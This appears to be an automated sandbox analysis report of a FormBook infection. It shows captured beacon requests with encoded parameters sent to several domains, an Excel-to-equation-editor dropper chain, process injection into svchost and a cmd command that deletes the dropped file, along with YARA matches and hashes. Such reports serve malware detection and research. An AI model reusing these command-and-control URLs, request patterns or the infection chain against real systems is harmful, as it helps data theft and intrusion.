                                                                                                                                                                                                            Host: www.streamelemeants.com
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Jan 27, 2021 07:18:21.128422022 CET823INHTTP/1.1 302 Found
                                                                                                                                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            content-length: 11
                                                                                                                                                                                                            date: Wed, 27 Jan 2021 06:18:20 GMT
                                                                                                                                                                                                            location: http://survey-smiles.com
                                                                                                                                                                                                            server: nginx
                                                                                                                                                                                                            set-cookie: sid=741ca2b8-6067-11eb-a37f-ec1f2a5069bc; path=/; domain=.streamelemeants.com; expires=Mon, 14 Feb 2089 09:32:28 GMT; max-age=2147483647; HttpOnly
                                                                                                                                                                                                            Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                                                                                                                                            Data Ascii: Redirecting


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            4192.168.2.2249170104.21.47.7580C:\Windows\explorer.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.342557907 CET824OUTGET /j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW HTTP/1.1
                                                                                                                                                                                                            Host: www.mct.ltd
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.398302078 CET825INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Wed, 27 Jan 2021 06:18:31 GMT
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: max-age=3600
                                                                                                                                                                                                            Expires: Wed, 27 Jan 2021 07:18:31 GMT
                                                                                                                                                                                                            Location: https://www.mct.ltd/j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW
                                                                                                                                                                                                            cf-request-id: 07e4176c5300000c1da19ab000000001
                                                                                                                                                                                                            Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UpxZJuciyFuqiOzFaeL3RT79v%2FcXG2kZq0ISzB4S55IY5BHR75N9knX0tkw1rbTyKHlgv2k5pe546yp7Y38IzdcaI5d75Lu0NSioUQ%3D%3D"}],"max_age":604800}
                                                                                                                                                                                                            NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 61805b5a18320c1d-AMS
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            5192.168.2.2249171103.209.233.7880C:\Windows\explorer.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 27, 2021 07:18:37.134948015 CET826OUTGET /j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXW HTTP/1.1
                                                                                                                                                                                                            Host: www.bmtxm.com
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Jan 27, 2021 07:18:37.445544958 CET826INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 27 Jan 2021 06:18:37 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 146
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                            HTTPS Packets

                                                                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.540261030 CET162.159.130.233443192.168.2.2249165CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                                                                                                                                            Code Manipulations

                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:15:53
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                            Imagebase:0x13fe80000
                                                                                                                                                                                                            File size:27641504 bytes
                                                                                                                                                                                                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:13
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:543304 bytes
                                                                                                                                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:15
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:772519 bytes
                                                                                                                                                                                                            MD5 hash:40BFB08CE97F3709F4DE7C6BA8B3401E
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:16
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                            File size:893608 bytes
                                                                                                                                                                                                            MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 5%, Metadefender, Browse
                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:16
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:893608 bytes
                                                                                                                                                                                                            MD5 hash:535DD1329AEF11BF4654B3270F026D5B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 21%, ReversingLabs
                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:20
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:
                                                                                                                                                                                                            Imagebase:0xffca0000
                                                                                                                                                                                                            File size:3229696 bytes
                                                                                                                                                                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:32
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                                                                                                            Imagebase:0x720000
                                                                                                                                                                                                            File size:658944 bytes
                                                                                                                                                                                                            MD5 hash:A475B7BB0CCCFD848AA26075E81D7888
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:33
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                            Imagebase:0xb60000
                                                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                                                            MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:36
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:/c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe'
                                                                                                                                                                                                            Imagebase:0x4abd0000
                                                                                                                                                                                                            File size:302592 bytes
                                                                                                                                                                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                                            Reset < >